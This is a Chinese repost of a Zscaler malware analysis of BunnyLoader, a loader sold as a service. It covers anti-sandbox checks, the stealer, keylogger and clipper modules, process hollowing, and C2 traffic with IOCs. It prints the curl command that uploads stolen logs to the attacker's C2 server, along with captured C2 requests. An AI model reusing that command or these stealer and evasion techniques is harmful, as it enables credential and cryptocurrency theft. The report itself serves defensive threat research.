新恶意软件BunnyLoader推出MaaS功能

介绍

9 月初，Zscaler ThreatLabz 发现一种名为“BunnyLoader”的新恶意软件即服务 (MaaS) 威胁正在各个论坛上出售。BunnyLoader 提供各种功能，例如下载和执行第二阶段有效负载、窃取浏览器凭据和系统信息等等。BunnyLoader 使用键盘记录器来记录击键，并使用剪辑器来监视受害者的剪贴板，并将加密货币钱包地址替换为攻击者控制的加密货币钱包地址。获得信息后，BunnyLoader 会将数据封装到 ZIP 存档中，然后将窃取的数据传输到命令和控制 (C2) 服务器。在本博客中，我们将描述 BunnyLoader 的工作原理及其技术组件。

要点

ThreatLabz 发现了一种用 C/C++ 编写的新恶意软件加载程序，名为“BunnyLoader”，在各个论坛上售价为 250 美元。

BunnyLoader 正在快速开发，有多项功能更新和错误修复。

BunnyLoader 在其攻击过程中采用了各种反沙箱技术。

BunnyLoader 下载并执行第二阶段有效负载、记录密钥、窃取敏感信息和加密货币，并执行远程命令。

基本

九月初，ThreatLabz 发现了一种名为 BunnyLoader 的新恶意软件加载程序。该恶意软件由名为“PLAYER_BUNNY”/“PLAYER_BL”的用户在各个论坛上出售，该用户似乎是该加载程序的开发人员之一，如下图所示。

图 1：来自犯罪论坛的 BunnyLoader 广告。

根据广告，BunnyLoader 具有以下特点：

用 C/C++ 编写

无文件加载程序 - 下载并在内存中执行进一步的恶意软件阶段

由窃取器和削波器功能组成

远程命令执行

结合了反分析技术

提供一个网页面板，显示窃取者日志、客户端总数、活动任务等

价格 - 250 美元（终身）

自 2023 年 9 月 4 日 BunnyLoader v1.0 首次发布以来，该恶意软件一直在快速开发，在 9 月 4 日至本博客撰写之时（2023 年 9 月 29 日）之间发布了许多功能更新和错误修复。在下表中，您可以看到 BunnyLoader 的更新解决了错误问题、C2 面板的更改，甚至新的定价层。

BunnyLoader 发布历史

C2面板

BunnyLoader C2 面板展示了各种任务的列表，包括：

下载并执行其他恶意软件

键盘记录

窃取凭证

操纵受害者的剪贴板来窃取加密货币

在受感染的机器上运行远程命令

面板中添加了由下载 URL 和加密货币钱包地址组成的参数，如下所示。

图 2：BunnyLoader C2 面板配置的屏幕截图。

BunnyLoader 面板还提供：

感染统计

连接/断开连接的客户端总数

活动任务

窃取者日志以及

可以从面板上清除该信息。

图 3：BunnyLoader C2 面板中的统计信息和清除数据的选项的屏幕截图。

此外，还可以通过C2面板远程控制被感染的机器，如下图所示。

图 4：BunnyLoader C2 面板的屏幕截图显示了受感染的系统。

技术分析

在下面的部分中，我们将分析 BunnyLoader 的恶意软件样本。 执行 BunnyLoader 后，加载程序将执行以下操作：

1、在 Run 注册表项 ( HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun ) 中创建一个名为“Spyware_Blocker”的新注册表值，其中该值是 BunnyLoader 二进制文件的路径。此注册表值允许 BunnyLoader 在计算机上保持持久性。

2、使用ShowWindow()和nCmdShow作为SW_HIDE隐藏窗口

3、通过CreateMutexW()创建互斥体名称“BunnyLoader_MUTEXCONTROL”

4、执行以下反VM技术：

检查以下模块：

SxIn.dll - 360安全卫士

cmdvrt32.dll / cmdvrt64.dll - Comodo 防病毒软件

wine_get_unix_file_name - 检测 Wine

SbieDll.dll - 沙盘

使用“ROOTCIMV2”查询检查虚拟机：

从 Win32_VideoController 选择 *

Win32_处理器

Win32_网络适配器

Win32_BIOS

从 Win32_ComputerSystem 选择 *

通过“/proc/1/cgroup”检查 Docker 容器 - 如果容器存在，BunnyLoader 不会执行进一步的恶意操作。

检查以下列入黑名单的沙箱用户名：

ANYRUN

Sandbox

Test

John Doe

Abby

Timmy

Maltest

malware

Emily

Timmy

Paul Jones

CurrentUser

IT-ADMIN

Walker

Lisa

WDAGUtilityAccount

Virus

fred

如果识别到沙箱，BunnyLoader 会抛出以下错误消息：

“此文件的版本与您当前运行的 Windows 版本不兼容。检查您计算机的系统信息，了解您是否需要该程序的 x86（32 位）或 x64（64 位）版本，然后联系软件发行商。”

否则，BunnyLoader 会向 C2 服务器执行 HTTP 注册请求，如下所示：

GET /Bunny/Add.php?country=&ip=&host=&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: BunnyLoader
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 11
Content-Type: text/html; 

Connected

发送到C2服务器（如上所示）的注册请求包含以下信息：

C2服务器请求中的信息

请求的用户代理设置为“BunnyLoader” 。如果 C2 的响应是“已连接”，则 BunnyLoader 会执行核心恶意操作。

任务执行

注册后，BunnyLoader 向 C2 服务器发送任务请求“ http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID= ”，用户代理为“兔子任务” 。如下所示，任务请求的响应由“ID”、“Name”和“Params”组成。

GET /Bunny/TaskHandler.php?BotID= HTTP/1.1
User-Agent: BunnyTasks
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 102
Content-Type: text/html; charset=UTF-8

ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc15k

这里的“Name”是要执行的模块（功能），“params”是传递给模块的参数。根据任务响应中收到的模块名称，BunnyLoader 进一步执行其操作。

BunnyLoader 包含以下任务：

木马下载器

下载并执行（无文件执行）

下载并执行（磁盘执行）

入侵者

运行Keylogger

运行Stealer

Clipper

Bitcoin

Monero

Ethereum

Litecoin

Dogecoin

ZCash

Tether

远程命令执行

运行Keylogger Task

BunnyLoader 使用GetAsyncKeyState()实现一个基本的键盘记录器来记录击键。键盘记录器的输出存储在文件“ C:Users\AppDataLocalKeylines.txt ”中。

运行 Stealer

BunnyStealer 旨在窃取与网络浏览器、加密货币钱包、VPN 等相关的信息。最终，被盗信息被存储在 AppdataLocal Directory 中名为“BunnyLogs”的文件夹中，该文件夹被压缩为 ZIP 存档，并渗透到 C2 服务器。以下是 BunnyLoader 所针对的 Web 浏览器：

7Star7StarUser Data
YandexYandexBrowserUser Data
CentBrowserUser Data
ComodoUser Data
ChedotUser Data
360BrowserBrowserUser Data
VivaldiUser Data
Maxthon3User Data
KometaUser Data
K-MelonUser Data
Elements BrowserUser Data
GoogleChromeUser Data\SputnikSputnikUser Data
Epic Privacy BrowserUser Data
NichromeUser Data
uCozMediaUranUser Data
CocCocBrowserUser Data
Fenrir IncSleipnir5settingmodulesChromiumViewer
UranUser Data
CatalinaGroupCitrioUser Data
ChromodoUser Data
CoowonCoowonUser Data
Mail.RuAtomUser Data
liebaoUser Data
MicrosoftEdgeUser Data
QIP SurfUser Data
BraveSoftwareBrave-BrowserUser Data
OrbitumUser Data
ChromiumUser Data
ComodoDragonUser Data
Google(x86)ChromeUser Data
AmigoUserUser Data
MapleStudioChromePlusUser Data
TorchUser Data
IridiumUser Data

BunnyLoader 从这些网络浏览器窃取以下信息：

AutoFill data

Credit cards

Downloads

History

Passwords

该恶意软件以以下加密货币钱包为目标：

Armory

Exodus

AutomaticWallet

Bytecoin

Ethereum

Coinomi

Jaxx

Electrum

Guarda

BunnyLoader 从以下 VPN 客户端窃取凭据：

ProtonVPN

OpenVPN

凭证也从以下消息应用程序中被盗：

Skype

Tox

Signal

Element

ICQ

被盗信息的示例如下图所示。日志由information.txt文件组成，其中包含系统信息以及与受感染计算机位置相关的信息。每个文件夹都包含从系统中窃取的相应数据。例如，浏览器文件夹包含 Web 浏览器历史记录和下载的文件信息。

图 5：BunnyLoader 泄露的信息的屏幕截图。

被盗数据使用 Powershell cmdlet 进行存档：System.IO.Compression.ZipFile ，文件名为“ BunnyLogs_.zip ”。ZIP 存档通过以下 CURL 命令渗透到 C2 服务器：

cmd.exe /c curl -F
"file=@C:UsersuserAppDataLocalBunnyLogs_468325.zip"
http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php

BunnyLoader 还执行窃取程序注册请求，其中包含与被盗信息相关的统计信息以及用户代理“ BunnyStealer”的泄露日志链接，如下所示：

GET /Bunny/StealerRegistration.php?country=&ip=&system=Micro
soft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&lin
k=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_
468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1
User-Agent: BunnyStealer
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

Clipper 任务

BunnyLoader Clipper 模块检查受害者的剪贴板中是否有与加密货币地址匹配的内容，并将其替换为威胁行为者控制的钱包地址。

在这种情况下，目标加密货币是：

Bitcoin

Monero

Ethereum

Litecoin

Dogecoin

ZCash

Tether

Clipper 从 C2 服务器接收要替换的加密货币钱包地址。

下载并执行任务

BunnyLoader 执行两种类型的下载和执行功能。

第一种是从C2提供的URL下载文件，写入磁盘的AppDataLocal目录中并进一步执行。

第二种类型使用无文件执行，其中 BunnyLoader 创建一个处于挂起状态的“notepad.exe”进程，然后使用用户代理“BunnyLoader_Dropper”从接收到的 URL 下载有效负载。下载的二进制文件存储在内存缓冲区中，BunnyLoader 执行Process Hollowing将下载的有效负载注入“notepad.exe”进程，如下图所示。

图 6：BunnyLoader 无文件下载和执行代码的屏幕截图。

任务完成后，BunnyLoader 发送以下任务完成请求，用户代理为“TaskCompleted”，CommandID 为任务 ID。任务完成请求示例如下所示：

http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461

远程命令执行任务

BunnyLoader 从 C2 面板执行远程命令。BunnyLoader 通过向 C2 服务器发出“echoer”请求（例如http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php ）接收要在受感染计算机上执行的命令用户代理设置为“BunnyTasks”，如下图所示。BunnyLoader 解析响应并检查以下命令：“help”、“cd”、“pwd”，然后使用_popen执行命令，命令输出作为“ &value= ”参数发送到 C2 服务器结果命令请求：（例如，http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php ），用户代理：“ BunnyShell” 。

图 7：BunnyLoader 远程命令执行的屏幕截图。

BunnyLoader 还会执行心跳请求，以通知 C2 受感染的系统处于在线状态，如下所示。心跳的用户代理是“HeartBeat_Sender”。

GET /Bunny/Heartbeat.php?country=&ip=&host=&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: HeartBeat_Sender
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 13
Content-Type: text/html; charset=UTF-8

Client online

结论

BunnyLoader 是一种新的 MaaS 威胁，它不断改进其策略并添加新功能，以针对其目标开展成功的活动。

图 10：Zscaler 沙盒检测 BunnyLoader。

IOCs

C2 Server - 37[.]139[.]129[.]145/Bunny/

BunnyLoader 示例：

dbf727e1effc3631ae634d95a0d88bf3
bbf53c2f20ac95a3bc18ea7575f2344b
59ac3eacd67228850d5478fd3f18df78

转载来源： https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service

图片来源网络侵权可联系删除